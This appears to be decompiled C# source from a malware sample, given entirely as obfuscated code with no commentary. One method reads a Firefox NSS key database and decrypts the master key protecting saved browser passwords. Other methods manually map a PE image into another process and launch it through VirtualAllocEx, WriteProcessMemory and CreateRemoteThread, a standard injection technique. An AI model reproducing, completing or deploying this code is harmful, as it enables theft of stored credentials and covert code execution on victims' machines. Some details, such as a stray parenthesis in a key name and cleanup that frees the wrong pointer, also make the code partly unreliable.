// Token: 0x06000157 RID: 343 RVA: 0x0000BFC4 File Offset: 0x0000A1C4
private static byte[] smethod_9(string string_3)
{
byte[] array = new byte[24];
byte[] result;
try
{
if (File.Exists(string_3))
{
GClass8 gclass = new GClass8(string_3);
gclass.method_3("metaData");
string s = gclass.method_2(0, "item1");
string s2 = gclass.method_2(0, "item2)");
GClass12 gclass2 = GClass10.smethod_0(Encoding.Default.GetBytes(s2));
byte[] byte_ = gclass2.List_0[0].List_0[0].List_0[1].List_0[0].Byte_0;
byte[] byte_2 = gclass2.List_0[0].List_0[1].Byte_0;
GClass16 gclass3 = new GClass16(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), byte_);
gclass3.method_0();
GClass14.smethod_0(gclass3.Byte_3, gclass3.Byte_4, byte_2, PaddingMode.None);
gclass.method_3("nssPrivate");
int int32_ = gclass.Int32_0;
string s3 = string.Empty;
for (int i = 0; i < int32_; i++)
{
if (gclass.method_2(i, "a102") == Encoding.Default.GetString(Class13.byte_0))
{
s3 = gclass.method_2(i, "a11");
IL_176:
GClass12 gclass4 = GClass10.smethod_0(Encoding.Default.GetBytes(s3));
byte_ = gclass4.List_0[0].List_0[0].List_0[1].List_0[0].Byte_0;
byte_2 = gclass4.List_0[0].List_0[1].Byte_0;
gclass3 = new GClass16(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), byte_);
gclass3.method_0();
array = Encoding.Default.GetBytes(GClass14.smethod_0(gclass3.Byte_3, gclass3.Byte_4, byte_2, PaddingMode.PKCS7));
return(array);
}
}
goto IL_176;
}
result = array;
}
catch (Exception)
{
result = array;
}
return(result);
}
// Token: 0x06000353 RID: 851 RVA: 0x01038F04 File Offset: 0x01037104
private static void smethod_7(GClass8 gclass8_0, IntPtr intptr_7, IntPtr intptr_8)
{
foreach (GStruct14 gstruct in gclass8_0.method_9())
{
byte[] array = new byte[gstruct.SizeOfRawData];
if (!gclass8_0.method_2((long)((ulong)gstruct.PointerToRawData), SeekOrigin.Begin, array))
{
throw gclass8_0.vmethod_1();
}
if ((gstruct.Characteristics & 33554432u) == 0u)
{
uint num;
GClass5.WriteProcessMemory(intptr_7, intptr_8.smethod_0((long)((ulong)gstruct.VirtualAddress)), array, array.Length, out num);
IntPtr intPtr = intptr_8.smethod_0((long)((ulong)gstruct.VirtualAddress));
GClass5.VirtualProtectEx(intptr_7, intPtr, gstruct.SizeOfRawData, gstruct.Characteristics & 16777215u, out num);
}
}
}
// Token: 0x06000328 RID: 808 RVA: 0x0103800C File Offset: 0x0103620C
public GClass14(GClass8 gclass8_1, GStruct13 gstruct13_1, bool bool_1, uint uint_1)
{
this.gclass8_0 = gclass8_1;
this.gstruct13_0 = gstruct13_1;
this.Boolean_0 = bool_1;
if (bool_1)
{
ushort num = 0;
if (gclass8_1.method_3 <ushort>((long)((ulong)(uint_1 + (gstruct13_1.NameRva & 2147483647u))), SeekOrigin.Begin, out num))
{
byte[] byte_ = new byte[(int)num << 1];
if (gclass8_1.method_2(0L, SeekOrigin.Current, byte_))
{
this.string_0 = GClass13.GClass14.smethod_1(GClass13.GClass14.smethod_0(), byte_);
}
}
if (this.string_0 == null)
{
throw gclass8_1.vmethod_1();
}
}
this.uint_0 = uint_1;
}
// Token: 0x06000352 RID: 850 RVA: 0x01038C54 File Offset: 0x01036E54
private static IntPtr smethod_6(GClass8 gclass8_0, IntPtr intptr_7, bool bool_0 = false)
{
if (intptr_7.smethod_4() || intptr_7.smethod_2(-1L))
{
throw new ArgumentException("Invalid process handle.", "hProcess");
}
if (gclass8_0 == null)
{
throw new ArgumentException("Cannot map a non-existant PE Image.", "image");
}
int processId = GClass5.GetProcessId(intptr_7);
if (processId == 0)
{
throw new ArgumentException("Provided handle doesn't have sufficient permissions to inject", "hProcess");
}
IntPtr intPtr = IntPtr.Zero;
IntPtr intPtr2 = IntPtr.Zero;
uint num = 0u;
try
{
intPtr = GClass5.VirtualAllocEx(intptr_7, IntPtr.Zero, gclass8_0.GStruct9_0.OptionalHeader.SizeOfImage, 12288, 4);
if (intPtr.smethod_4())
{
throw new InvalidOperationException("Unable to allocate memory in the remote process.");
}
Class7.smethod_9(gclass8_0, intPtr);
Class7.smethod_5(gclass8_0, intptr_7, processId);
Class7.smethod_8(gclass8_0, intptr_7, processId);
if (bool_0)
{
byte[] array = new byte[(ulong)gclass8_0.GStruct6_0.e_lfanew + (ulong)((long)Marshal.SizeOf(typeof(GStruct7))) + 4UL + (ulong)gclass8_0.GStruct9_0.FileHeader.SizeOfOptionalHeader];
if (gclass8_0.method_2(0L, SeekOrigin.Begin, array))
{
GClass5.WriteProcessMemory(intptr_7, intPtr, array, array.Length, out num);
}
}
Class7.smethod_7(gclass8_0, intptr_7, intPtr);
if (gclass8_0.GStruct9_0.OptionalHeader.AddressOfEntryPoint <= 0u)
{
return(intPtr);
}
byte[] array2 = (byte[])Class7.byte_0.Clone();
BitConverter.GetBytes(intPtr.ToInt32()).CopyTo(array2, 11);
intPtr2 = GClass5.VirtualAllocEx(intptr_7, IntPtr.Zero, (uint)Class7.byte_0.Length, 12288, 64);
if (!intPtr2.smethod_4() && GClass5.WriteProcessMemory(intptr_7, intPtr2, array2, array2.Length, out num))
{
if ((ulong)num == (ulong)((long)array2.Length))
{
IntPtr intPtr3 = GClass5.CreateRemoteThread(intptr_7, 0, 0, intPtr2, (uint)intPtr.smethod_0((long)((ulong)gclass8_0.GStruct9_0.OptionalHeader.AddressOfEntryPoint)).ToInt32(), 0, 0);
if ((ulong)GClass5.WaitForSingleObject(intPtr3, 5000) != 0UL)
{
return(intPtr);
}
GClass5.GetExitCodeThread(intPtr3, out num);
if (num == 0u)
{
GClass5.VirtualFreeEx(intptr_7, intPtr, 0, 32768);
throw new Exception("Entry method of module reported a failure " + Marshal.GetLastWin32Error().ToString());
}
GClass5.VirtualFreeEx(intptr_7, intPtr2, 0, 32768);
GClass5.CloseHandle(intPtr3);
return(intPtr);
}
}
throw new InvalidOperationException("Unable to write stub to the remote process.");
}
catch (Exception ex)
{
if (!intPtr.smethod_4())
{
GClass5.VirtualFreeEx(intptr_7, intPtr, 0, 32768);
}
if (!intPtr2.smethod_4())
{
GClass5.VirtualFreeEx(intptr_7, intPtr, 0, 32768);
}
intPtr = IntPtr.Zero;
throw ex;
}
return(intPtr);
}